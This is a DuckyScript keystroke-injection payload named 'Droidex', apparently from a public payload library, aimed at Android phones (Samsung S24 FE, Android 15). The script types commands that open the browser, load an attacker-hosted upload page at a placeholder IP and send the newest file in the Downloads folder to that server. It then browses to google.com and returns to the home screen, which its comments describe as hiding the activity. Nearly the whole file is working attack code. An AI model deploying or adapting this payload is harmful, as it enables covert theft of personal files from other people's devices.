Path: blob/master/payloads/library/mobile/Android/Droidex/payload.txt
2971 views
REM TITLE: Droidex1REM AUTHOR: OSINTI4L (https://github.com/OSINTI4L)2REM TARGET OS: Android (tested on Samsung S24 FE | Android 15 | One UI 7.0)3REM DESCRIPTION: Droidex exfiltrates the top file stored in the Downloads directory of target mobile device to a self-hosted python webserver over LAN. To function you will need a webserver hosted locally on a personal machine and corresponding webserver IP address (see ReadMe). Place the server IP address on line 6 #IPA constant.45DEFINE #IPA x.x.x.x:8000/upload67REM: Begin attack:8ATTACKMODE HID9DELAY 10001011REM: Navigating to Google Search to access web browser:12GUI f13DELAY 60014STRING google search15DELAY 10016ENTER17DELAY 40018DOWNARROW19DELAY 40020ENTER21DELAY 4002223REM Navigating to upload portal and accessing files:24STRINGLN #IPA25DELAY 70026TAB27ENTER28DELAY 6002930REM Selecting file:31ENTER32DELAY 40033TAB34ENTER3536REM Navigating browser to google.com and returning to home screen to obfuscate activity:37DELAY 120038TAB39DELAY 15040STRINGLN google.com41GUI h424344